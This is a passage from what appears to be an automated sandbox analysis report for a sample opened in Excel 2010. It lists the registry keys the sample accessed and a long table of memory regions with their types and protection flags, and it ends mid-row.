HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\377BF
|
377BF
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Handshake\{819EB824-4817-4048-BBF5-A7A0A0C35676}
|
data
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 67 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
874000
|
heap
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
25D3000
|
trusted library allocation
|
page read and write
|
||
2410000
|
trusted library allocation
|
page read and write
|
||
350F000
|
trusted library allocation
|
page read and write
|
||
3529000
|
trusted library allocation
|
page read and write
|
||
2591000
|
trusted library allocation
|
page read and write
|
||
274000
|
heap
|
page read and write
|
||
62D000
|
heap
|
page read and write
|
||
1B2BB000
|
stack
|
page read and write
|
||
866E000
|
stack
|
page read and write
|
||
439E000
|
heap
|
page read and write
|
||
274F000
|
trusted library allocation
|
page read and write
|
||
4F7000
|
heap
|
page read and write
|
||
4F24000
|
heap
|
page read and write
|
||
2C1A000
|
stack
|
page read and write
|
||
4D7C000
|
heap
|
page read and write
|
||
2699000
|
trusted library allocation
|
page read and write
|
||
2725000
|
trusted library allocation
|
page read and write
|
||
49D000
|
direct allocation
|
page read and write
|
||
48FD000
|
heap
|
page read and write
|
||
3A0000
|
heap
|
page read and write
|
||
646000
|
heap
|
page read and write
|
||
1C8A0000
|
heap
|
page read and write
|
||
271B000
|
trusted library allocation
|
page read and write
|
||
2C45000
|
trusted library allocation
|
page read and write
|
||
26BD000
|
trusted library allocation
|
page read and write
|
||
2C2D000
|
trusted library allocation
|
page read and write
|
||
564000
|
heap
|
page read and write
|
||
269F000
|
trusted library allocation
|
page read and write
|
||
52AD000
|
heap
|
page read and write
|
||
539E000
|
heap
|
page read and write
|
||
48FD000
|
heap
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
1B400000
|
heap
|
page read and write
|
||
110000
|
trusted library allocation
|
page read and write
|
||
22F4000
|
heap
|
page read and write
|
||
26B3000
|
trusted library allocation
|
page read and write
|
||
27B000
|
stack
|
page read and write
|
||
20F000
|
heap
|
page read and write
|
||
48C2000
|
heap
|
page read and write
|
||
4ED7000
|
heap
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
4E63000
|
heap
|
page read and write
|
||
7FE89264000
|
trusted library allocation
|
page read and write
|
||
2B10000
|
remote allocation
|
page read and write
|
||
197000
|
trusted library allocation
|
page execute and read and write
|
||
3D5C000
|
heap
|
page read and write
|
||
25A9000
|
trusted library allocation
|
page read and write
|
||
38D000
|
heap
|
page read and write
|
||
26D1000
|
trusted library allocation
|
page read and write
|
||
808E000
|
stack
|
page read and write
|
||
4AF1000
|
heap
|
page read and write
|
||
192000
|
heap
|
page read and write
|
||
62A000
|
heap
|
page read and write
|
||
4F43000
|
heap
|
page read and write
|
||
48F7000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
437E000
|
heap
|
page read and write
|
||
52AA000
|
heap
|
page read and write
|
||
2763000
|
trusted library allocation
|
page read and write
|
||
103C000
|
stack
|
page read and write
|
||
26DD000
|
trusted library allocation
|
page read and write
|
||
4F05000
|
heap
|
page read and write
|
||
820D000
|
stack
|
page read and write
|
||
D2C000
|
stack
|
page read and write
|
||
377000
|
heap
|
page read and write
|
||
363000
|
heap
|
page read and write
|
||
7FE89280000
|
trusted library allocation
|
page read and write
|
||
A40000
|
trusted library allocation
|
page read and write
|
||
4F0E000
|
heap
|
page read and write
|
||
4F54000
|
heap
|
page read and write
|
||
273000
|
heap
|
page read and write
|
||
1AFF7000
|
heap
|
page read and write
|
||
4C2000
|
heap
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
410F000
|
stack
|
page read and write
|
||
26C5000
|
trusted library allocation
|
page read and write
|
||
2C32000
|
trusted library allocation
|
page read and write
|
||
279D000
|
trusted library allocation
|
page read and write
|
||
3DAA000
|
heap
|
page read and write
|
||
42A0000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
1AF60000
|
heap
|
page read and write
|
||
512000
|
heap
|
page read and write
|
||
5BC000
|
heap
|
page read and write
|
||
3361000
|
trusted library allocation
|
page read and write
|
||
2685000
|
trusted library allocation
|
page read and write
|
||
2C29000
|
trusted library allocation
|
page read and write
|
||
2E6000
|
heap
|
page read and write
|
||
170000
|
heap
|
page read and write
|
||
4F47000
|
heap
|
page read and write
|
||
7FE89288000
|
trusted library allocation
|
page read and write
|
||
2C48000
|
trusted library allocation
|
page read and write
|
||
1B50B000
|
stack
|
page read and write
|
||
21A2000
|
heap
|
page read and write
|
||
4F2A000
|
heap
|
page read and write
|
||
5C2000
|
heap
|
page read and write
|
||
5538000
|
heap
|
page read and write
|
||
3DF0000
|
trusted library allocation
|
page read and write
|
||
2F10000
|
trusted library allocation
|
page read and write
|
||
4C0000
|
direct allocation
|
page read and write
|
||
2789000
|
trusted library allocation
|
page read and write
|
||
26F7000
|
trusted library allocation
|
page read and write
|
||
4A0000
|
direct allocation
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
690000
|
heap
|
page read and write
|
||
87EE000
|
stack
|
page read and write | page guard
|
||
4F47000
|
heap
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
4D96000
|
heap
|
page read and write
|
||
469000
|
heap
|
page read and write
|
||
3A0000
|
trusted library allocation
|
page execute and read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
35D000
|
heap
|
page read and write
|
||
1A8DF000
|
stack
|
page read and write
|
||
296000
|
heap
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
55B0000
|
heap
|
page read and write
|
||
10F0000
|
unkown
|
page readonly
|
||
3D89000
|
heap
|
page read and write
|
||
3D5C000
|
heap
|
page read and write
|
||
53CD000
|
heap
|
page read and write
|
||
910000
|
heap
|
page read and write
|
||
572B000
|
heap
|
page read and write
|
||
917000
|
heap
|
page read and write
|
||
26A3000
|
trusted library allocation
|
page read and write
|
||
3DAF000
|
heap
|
page read and write
|
||
847000
|
heap
|
page read and write
|
||
52A6000
|
heap
|
page read and write
|
||
277B000
|
trusted library allocation
|
page read and write
|
||
4AF0000
|
heap
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
3DA0000
|
trusted library allocation
|
page read and write
|
||
2C56000
|
trusted library allocation
|
page read and write
|
||
5772000
|
heap
|
page read and write
|
||
3DB000
|
heap
|
page read and write
|
||
26E7000
|
trusted library allocation
|
page read and write
|
||
334000
|
heap
|
page read and write
|
||
31D000
|
heap
|
page read and write
|
||
1B5BE000
|
stack
|
page read and write
|
||
1C6F0000
|
heap
|
page read and write
|
||
1F30000
|
heap
|
page read and write
|
||
4F2A000
|
heap
|
page read and write
|
||
3CF0000
|
heap
|
page read and write
|
||
469000
|
heap
|
page read and write
|
||
36E000
|
heap
|
page read and write
|
||
4F45000
|
heap
|
page read and write
|
||
371F000
|
trusted library allocation
|
page read and write
|
||
3CF0000
|
heap
|
page read and write
|
||
5738000
|
heap
|
page read and write
|
||
44F000
|
unkown
|
page read and write
|
||
1B4AE000
|
stack
|
page read and write
|
||
277F000
|
stack
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
4A54000
|
heap
|
page read and write
|
||
4F03000
|
heap
|
page read and write
|
||
34D1000
|
trusted library allocation
|
page read and write
|
||
7FE8A934000
|
trusted library allocation
|
page read and write
|
||
5230000
|
trusted library allocation
|
page read and write
|
||
1CB0000
|
direct allocation
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
33C0000
|
direct allocation
|
page read and write
|
||
48FD000
|
heap
|
page read and write
|
||
4367000
|
heap
|
page read and write
|
||
2D83000
|
trusted library allocation
|
page read and write
|
||
3610000
|
heap
|
page read and write
|
||
1AA29000
|
stack
|
page read and write
|
||
4BDE000
|
heap
|
page read and write
|
||
5780000
|
heap
|
page read and write
|
||
3CF0000
|
heap
|
page read and write
|
||
5236000
|
heap
|
page read and write
|
||
4321000
|
heap
|
page read and write
|
||
4301000
|
heap
|
page read and write
|
||
27A1000
|
trusted library allocation
|
page read and write
|
||
27A5000
|
trusted library allocation
|
page read and write
|
||
52AA000
|
heap
|
page read and write
|
||
48F7000
|
heap
|
page read and write
|
||
4D00000
|
heap
|
page read and write
|
||
60000
|
heap
|
page read and write
|
||
26A5000
|
trusted library allocation
|
page read and write
|
||
1EDF000
|
stack
|
page read and write
|
||
24BE000
|
stack
|
page read and write
|
||
3EF000
|
heap
|
page read and write
|
||
2C50000
|
trusted library allocation
|
page read and write
|
||
420000
|
trusted library allocation
|
page read and write
|
||
4F1A000
|
heap
|
page read and write
|
||
3C2000
|
trusted library allocation
|
page read and write
|
||
350F000
|
trusted library allocation
|
page read and write
|
||
4D73000
|
heap
|
page read and write
|
||
26F3000
|
trusted library allocation
|
page read and write
|
||
36E000
|
heap
|
page read and write
|
||
3D37000
|
heap
|
page read and write
|
||
4F5B000
|
heap
|
page read and write
|
||
4DD9000
|
heap
|
page read and write
|
||
3A7000
|
heap
|
page read and write
|
||
EF2000
|
heap
|
page read and write
|
||
4F3A000
|
heap
|
page read and write
|
||
4BDE000
|
heap
|
page read and write
|
||
539E000
|
heap
|
page read and write
|
||
4F0000
|
trusted library allocation
|
page read and write
|
||
2687000
|
trusted library allocation
|
page read and write
|
||
34DD000
|
trusted library allocation
|
page read and write
|
||
4E0000
|
trusted library allocation
|
page read and write
|
||
4D2000
|
heap
|
page read and write
|
||
4D6B000
|
heap
|
page read and write
|
||
3D2F000
|
heap
|
page read and write
|
||
3745000
|
trusted library allocation
|
page read and write
|
||
5130000
|
heap
|
page read and write
|
||
AA0000
|
trusted library allocation
|
page read and write
|
||
7FE8923C000
|
trusted library allocation
|
page read and write
|
||
48FD000
|
heap
|
page read and write
|
||
26DF000
|
trusted library allocation
|
page read and write
|
||
53CE000
|
stack
|
page read and write
|
||
279B000
|
trusted library allocation
|
page read and write
|
||
48FD000
|
heap
|
page read and write
|
||
578D000
|
heap
|
page read and write
|
||
7B4000
|
heap
|
page read and write
|
||
272F000
|
trusted library allocation
|
page read and write
|
||
7FE8A9E0000
|
trusted library allocation
|
page read and write
|
||
3447000
|
direct allocation
|
page read and write
|
||
1D0000
|
trusted library allocation
|
page read and write
|
||
1CF3000
|
direct allocation
|
page read and write
|
||
3E9000
|
heap
|
page read and write
|
||
3581000
|
trusted library allocation
|
page read and write
|
||
26FB000
|
trusted library allocation
|
page read and write
|
||
4DB9000
|
heap
|
page read and write
|
||
390000
|
trusted library allocation
|
page read and write
|
||
4DC7000
|
heap
|
page read and write
|
||
4ECF000
|
heap
|
page read and write
|
||
572B000
|
heap
|
page read and write
|
||
1C4C5000
|
heap
|
page read and write
|
||
4D66000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4C0000
|
trusted library allocation
|
page read and write
|
||
7F4F000
|
stack
|
page read and write
|
||
1CA2F000
|
stack
|
page read and write
|
||
39F000
|
heap
|
page read and write
|
||
1A0000
|
heap
|
page read and write
|
||
38D000
|
heap
|
page read and write
|
||
38E000
|
heap
|
page read and write
|
||
2D80000
|
trusted library allocation
|
page read and write
|
||
52C9000
|
heap
|
page read and write
|
||
899F000
|
stack
|
page read and write
|
||
5533000
|
heap
|
page read and write
|
||
7FE8AC60000
|
trusted library allocation
|
page read and write
|
||
48F9000
|
heap
|
page read and write
|
||
38A000
|
heap
|
page read and write
|
||
4D86000
|
heap
|
page read and write
|
||
379E000
|
stack
|
page read and write
|
||
614000
|
heap
|
page read and write
|
||
34C000
|
heap
|
page read and write
|
||
43BB000
|
trusted library section
|
page read and write
|
||
1C80F000
|
stack
|
page read and write
|
||
647000
|
heap
|
page read and write
|
||
646000
|
heap
|
page read and write
|
||
4D69000
|
heap
|
page read and write
|
||
630000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
5D9000
|
heap
|
page read and write
|
||
7FE891A0000
|
trusted library allocation
|
page execute and read and write
|
||
48F7000
|
heap
|
page read and write
|
||
130000
|
trusted library allocation
|
page read and write
|
||
58E000
|
heap
|
page read and write
|
||
520000
|
trusted library allocation
|
page read and write
|
||
4912000
|
heap
|
page read and write
|
||
388000
|
heap
|
page read and write
|
||
39C000
|
heap
|
page read and write
|
||
2769000
|
trusted library allocation
|
page read and write
|
||
26E9000
|
trusted library allocation
|
page read and write
|
||
4885000
|
heap
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
3749000
|
trusted library allocation
|
page read and write
|
||
558000
|
heap
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
27A1000
|
trusted library allocation
|
page read and write
|
||
23A5000
|
heap
|
page read and write
|
||
26F1000
|
trusted library allocation
|
page read and write
|
||
336000
|
heap
|
page read and write
|
||
4D1A000
|
heap
|
page read and write
|
||
43E0000
|
trusted library allocation
|
page read and write
|
||
3D8C000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
52AA000
|
heap
|
page read and write
|
||
3AC0000
|
trusted library allocation
|
page read and write
|
||
49AF000
|
stack
|
page read and write
|
||
10CC000
|
stack
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
2C27000
|
trusted library allocation
|
page read and write
|
||
295E000
|
trusted library allocation
|
page read and write
|
||
529A000
|
heap
|
page read and write
|
||
540000
|
heap
|
page read and write
|
||
71D000
|
heap
|
page read and write
|
||
2455000
|
heap
|
page read and write
|
||
2050000
|
heap
|
page read and write
|
||
7FE8A9EC000
|
trusted library allocation
|
page execute and read and write
|
||
360000
|
heap
|
page read and write
|
||
516F000
|
stack
|
page read and write
|
||
E0000
|
heap
|
page read and write
|
||
2701000
|
trusted library allocation
|
page read and write
|
||
30D0000
|
trusted library allocation
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
30A000
|
heap
|
page read and write
|
||
275F000
|
trusted library allocation
|
page read and write
|
||
491D000
|
stack
|
page read and write
|
||
46E000
|
heap
|
page read and write
|
||
3720000
|
trusted library allocation
|
page read and write
|
||
7FE8AB38000
|
trusted library allocation
|
page read and write
|
||
7CCD000
|
stack
|
page read and write
|
||
5780000
|
heap
|
page read and write
|
||
4F1E000
|
stack
|
page read and write
|
||
200000
|
heap
|
page read and write
|
||
34F8000
|
trusted library allocation
|
page read and write
|
||
2C5E000
|
trusted library allocation
|
page read and write
|
||
5376000
|
heap
|
page read and write
|
||
48F3000
|
heap
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
5780000
|
heap
|
page read and write
|
||
512000
|
heap
|
page read and write
|
||
4F24000
|
heap
|
page read and write
|
||
C60000
|
heap
|
page execute and read and write
|
||
7FE892D0000
|
trusted library allocation
|
page read and write
|
||
370000
|
trusted library allocation
|
page execute and read and write
|
||
2B0000
|
heap
|
page read and write
|
||
323000
|
heap
|
page read and write
|
||
5335000
|
heap
|
page read and write
|
||
2695000
|
trusted library allocation
|
page read and write
|
||
C1F000
|
stack
|
page read and write
|
||
49D000
|
heap
|
page read and write
|
||
10E0000
|
unkown
|
page readonly
|
||
39D000
|
heap
|
page read and write
|
||
37B000
|
heap
|
page read and write
|
||
366000
|
heap
|
page read and write
|
||
4F54000
|
heap
|
page read and write
|
||
3CF0000
|
heap
|
page read and write
|
||
4D2000
|
heap
|
page read and write
|
||
4F08000
|
heap
|
page read and write
|
||
4F39000
|
heap
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
26F5000
|
trusted library allocation
|
page read and write
|
||
527D000
|
heap
|
page read and write
|
||
2C4E000
|
trusted library allocation
|
page read and write
|
||
23DB000
|
heap
|
page read and write
|
||
56C3000
|
heap
|
page read and write
|
||
4F2A000
|
heap
|
page read and write
|
||
52B0000
|
heap
|
page read and write
|
||
3F7E000
|
stack
|
page read and write
|
||
123000
|
trusted library allocation
|
page execute and read and write
|
||
147000
|
trusted library allocation
|
page execute and read and write
|
||
4F43000
|
heap
|
page read and write
|
||
1B6D0000
|
heap
|
page read and write
|
||
4FF000
|
heap
|
page read and write
|
||
1C20000
|
heap
|
page read and write
|
||
7FE8A933000
|
trusted library allocation
|
page execute and read and write
|
||
7FE8AAEC000
|
trusted library allocation
|
page read and write
|
||
2C32000
|
trusted library allocation
|
page read and write
|
||
1B2E9000
|
heap
|
page read and write
|
||
120000
|
heap
|
page read and write
|
||
2721000
|
trusted library allocation
|
page read and write
|
||
3CBD000
|
heap
|
page read and write
|
||
34DB000
|
trusted library allocation
|
page read and write
|
||
4E80000
|
heap
|
page read and write
|
||
1D0D000
|
direct allocation
|
page read and write
|
||
4778000
|
heap
|
page read and write
|
||
31D0000
|
trusted library allocation
|
page read and write
|
||
1C1DF000
|
stack
|
page read and write
|
||
3E9000
|
heap
|
page read and write
|
||
14F000
|
unkown
|
page read and write
|
||
56F0000
|
heap
|
page read and write
|
||
1A75E000
|
heap
|
page execute and read and write
|
||
3B3E000
|
stack
|
page read and write
|
||
271000
|
heap
|
page read and write
|
||
4F43000
|
heap
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
2707000
|
trusted library allocation
|
page read and write
|
||
1BCF000
|
stack
|
page read and write
|
||
5736000
|
heap
|
page read and write
|
||
3220000
|
trusted library allocation
|
page read and write
|
||
52AF000
|
heap
|
page read and write
|
||
4F40000
|
heap
|
page read and write
|
||
4700000
|
heap
|
page read and write
|
||
1A6AF000
|
stack
|
page read and write
|
||
4F1A000
|
heap
|
page read and write
|
||
3D94000
|
heap
|
page read and write
|
||
5230000
|
trusted library allocation
|
page read and write
|
||
26FF000
|
trusted library allocation
|
page read and write
|
||
5768000
|
heap
|
page read and write
|
||
616000
|
heap
|
page read and write
|
||
864E000
|
stack
|
page read and write | page guard
|
||
290000
|
heap
|
page read and write
|
||
522000
|
heap
|
page read and write
|
||
4F2A000
|
heap
|
page read and write
|
||
389000
|
heap
|
page read and write
|
||
269C000
|
trusted library allocation
|
page read and write
|
||
4E07000
|
heap
|
page read and write
|
||
4F40000
|
heap
|
page read and write
|
||
2767000
|
trusted library allocation
|
page read and write
|
||
5E2000
|
heap
|
page read and write
|
||
276D000
|
trusted library allocation
|
page read and write
|
||
573A000
|
heap
|
page read and write
|
||
4F3A000
|
heap
|
page read and write
|
||
54B0000
|
heap
|
page read and write
|
||
1A84F000
|
stack
|
page read and write
|
||
1E40000
|
heap
|
page execute and read and write
|
||
52AF000
|
heap
|
page read and write
|
||
7FE89220000
|
trusted library allocation
|
page read and write
|
||
385000
|
heap
|
page read and write
|
||
8A1000
|
heap
|
page read and write
|
||
48F7000
|
heap
|
page read and write
|
||
137000
|
trusted library allocation
|
page read and write
|
||
7EBE000
|
unkown
|
page read and write
|
||
3A6000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
4F03000
|
heap
|
page read and write
|
||
3A7000
|
heap
|
page read and write
|
||
2D0000
|
heap
|
page read and write
|
||
4F54000
|
heap
|
page read and write
|
||
1C5CA000
|
stack
|
page read and write
|
||
1DC0000
|
heap
|
page read and write
|
||
1D0B000
|
direct allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4F08000
|
heap
|
page read and write
|
||
2743000
|
trusted library allocation
|
page read and write
|
||
7FE8AB12000
|
trusted library allocation
|
page read and write
|
||
1B4000
|
heap
|
page read and write
|
||
D6E000
|
stack
|
page read and write
|
||
68000
|
heap
|
page read and write
|
||
1AF69000
|
heap
|
page read and write
|
||
2C48000
|
trusted library allocation
|
page read and write
|
||
27A7000
|
trusted library allocation
|
page read and write
|
||
3CE0000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4B77000
|
heap
|
page read and write
|
||
3D37000
|
heap
|
page read and write
|
||
4ECF000
|
heap
|
page read and write
|
||
5205000
|
heap
|
page read and write
|
||
274D000
|
trusted library allocation
|
page read and write
|
||
4E5B000
|
heap
|
page read and write
|
||
3D9E000
|
heap
|
page read and write
|
||
4F5B000
|
heap
|
page read and write
|
||
67F000
|
unkown
|
page read and write
|
||
3DAA000
|
heap
|
page read and write
|
||
5337000
|
heap
|
page read and write
|
||
4F54000
|
heap
|
page read and write
|
||
5686000
|
heap
|
page read and write
|
||
4E37000
|
heap
|
page read and write
|
||
1BC6000
|
heap
|
page read and write
|
||
562E000
|
stack
|
page read and write
|
||
3D42000
|
heap
|
page read and write
|
||
851E000
|
stack
|
page read and write
|
||
643000
|
heap
|
page read and write
|
||
307A000
|
stack
|
page read and write
|
||
267F000
|
trusted library allocation
|
page read and write
|
||
54B1000
|
heap
|
page read and write
|
||
3CDF000
|
heap
|
page read and write
|
||
4EBC000
|
heap
|
page read and write
|
||
4B1000
|
heap
|
page read and write
|
||
4CD000
|
heap
|
page read and write
|
||
7FE8913C000
|
trusted library allocation
|
page execute and read and write
|
||
4040000
|
trusted library allocation
|
page read and write
|
||
12C000
|
stack
|
page read and write
|
||
2711000
|
trusted library allocation
|
page read and write
|
||
376E000
|
trusted library allocation
|
page read and write
|
||
38C000
|
heap
|
page read and write
|
||
5356000
|
heap
|
page read and write
|
||
382000
|
heap
|
page read and write
|
||
572E000
|
heap
|
page read and write
|
||
187000
|
trusted library allocation
|
page execute and read and write
|
||
3DE000
|
heap
|
page read and write
|
||
2C57000
|
trusted library allocation
|
page read and write
|
||
7FE8ABC0000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4834000
|
heap
|
page read and write
|
||
573C000
|
heap
|
page read and write
|
||
1C2A3000
|
heap
|
page read and write
|
||
3D5A000
|
heap
|
page read and write
|
||
5736000
|
heap
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
2C54000
|
trusted library allocation
|
page read and write
|
||
1F20000
|
heap
|
page read and write
|
||
14D000
|
heap
|
page read and write
|
||
2C23000
|
trusted library allocation
|
page read and write
|
||
5736000
|
heap
|
page read and write
|
||
43D8000
|
trusted library allocation
|
page read and write
|
||
210000
|
heap
|
page read and write
|
||
4FD000
|
heap
|
page read and write
|
||
3A9000
|
heap
|
page read and write
|
||
2709000
|
trusted library allocation
|
page read and write
|
||
1C53D000
|
stack
|
page read and write
|
||
14D000
|
stack
|
page read and write
|
||
3DB000
|
heap
|
page read and write
|
||
1EE0000
|
direct allocation
|
page read and write
|
||
350000
|
heap
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
4D3000
|
heap
|
page read and write
|
||
3745000
|
trusted library allocation
|
page read and write
|
||
1A728000
|
heap
|
page execute and read and write
|
||
4F2A000
|
heap
|
page read and write
|
||
3A3000
|
heap
|
page read and write
|
||
410000
|
heap
|
page read and write
|
||
2723000
|
trusted library allocation
|
page read and write
|
||
2471000
|
trusted library allocation
|
page read and write
|
||
4DA8000
|
heap
|
page read and write
|
||
1C9CC000
|
stack
|
page read and write
|
||
3745000
|
trusted library allocation
|
page read and write
|
||
39C000
|
heap
|
page read and write
|
||
7FE8AAE3000
|
trusted library allocation
|
page read and write
|
||
50EE000
|
stack
|
page read and write
|
||
4369000
|
heap
|
page read and write
|
||
54F6000
|
heap
|
page read and write
|
||
6C5000
|
heap
|
page read and write
|
||
2E0F000
|
stack
|
page read and write
|
||
1CF0000
|
direct allocation
|
page read and write
|
||
1B15E000
|
stack
|
page read and write
|
||
15B000
|
trusted library allocation
|
page execute and read and write
|
||
1C820000
|
heap
|
page read and write
|
||
4EF4000
|
heap
|
page read and write
|
||
3D7B000
|
heap
|
page read and write
|
||
572E000
|
heap
|
page read and write
|
||
484000
|
heap
|
page read and write
|
||
4E65000
|
heap
|
page read and write
|
||
3DB000
|
heap
|
page read and write
|
||
300000
|
heap
|
page read and write
|
||
3DA0000
|
heap
|
page read and write
|
||
347000
|
trusted library allocation
|
page execute and read and write
|
||
4F3A000
|
heap
|
page read and write
|
||
1DE000
|
heap
|
page read and write
|
||
4C6000
|
heap
|
page read and write
|
||
38E000
|
heap
|
page read and write
|
||
3F84000
|
heap
|
page read and write
|
||
3D55000
|
heap
|
page read and write
|
||
52AE000
|
heap
|
page read and write
|
||
7FE8A943000
|
trusted library allocation
|
page read and write
|
||
4F3E000
|
heap
|
page read and write
|
||
19B000
|
trusted library allocation
|
page execute and read and write
|
||
32B000
|
heap
|
page read and write
|
||
3E40000
|
trusted library allocation
|
page read and write
|
||
10E000
|
heap
|
page read and write
|
||
2500000
|
trusted library allocation
|
page read and write
|
||
4F47000
|
heap
|
page read and write
|
||
4F0000
|
trusted library allocation
|
page execute and read and write
|
||
3CDF000
|
heap
|
page read and write
|
||
4D3F000
|
heap
|
page read and write
|
||
37D0000
|
trusted library allocation
|
page read and write
|
||
578D000
|
heap
|
page read and write
|
||
26AB000
|
trusted library allocation
|
page read and write
|
||
2BC0000
|
heap
|
page read and write
|
||
5780000
|
heap
|
page read and write
|
||
2C36000
|
trusted library allocation
|
page read and write
|
||
539E000
|
heap
|
page read and write
|
||
24E000
|
stack
|
page read and write
|
||
5204000
|
heap
|
page read and write
|
||
3E7000
|
heap
|
page read and write
|
||
273000
|
heap
|
page read and write
|
||
5170000
|
heap
|
page read and write
|
||
3D42000
|
heap
|
page read and write
|
||
3D95000
|
heap
|
page read and write
|
||
7FE892F0000
|
trusted library allocation
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
290000
|
heap
|
page read and write
|
||
2BB000
|
stack
|
page read and write
|
||
1B0C0000
|
heap
|
page read and write
|
||
33D000
|
trusted library allocation
|
page execute and read and write
|
||
4F47000
|
heap
|
page read and write
|
||
1B9000
|
heap
|
page read and write
|
||
1A7A0000
|
heap
|
page read and write
|
||
2600000
|
trusted library allocation
|
page read and write
|
||
50BE000
|
stack
|
page read and write
|
||
1C2E1000
|
heap
|
page read and write
|
||
4F47000
|
heap
|
page read and write
|
||
4F54000
|
heap
|
page read and write
|
||
5376000
|
heap
|
page read and write
|
||
273000
|
heap
|
page read and write
|
||
4F43000
|
heap
|
page read and write
|
||
43DD000
|
trusted library allocation
|
page read and write
|
||
142000
|
trusted library allocation
|
page read and write
|
||
865000
|
heap
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
4E65000
|
heap
|
page read and write
|
||
4C3000
|
heap
|
page read and write
|
||
420000
|
heap
|
page read and write
|
||
3A3E000
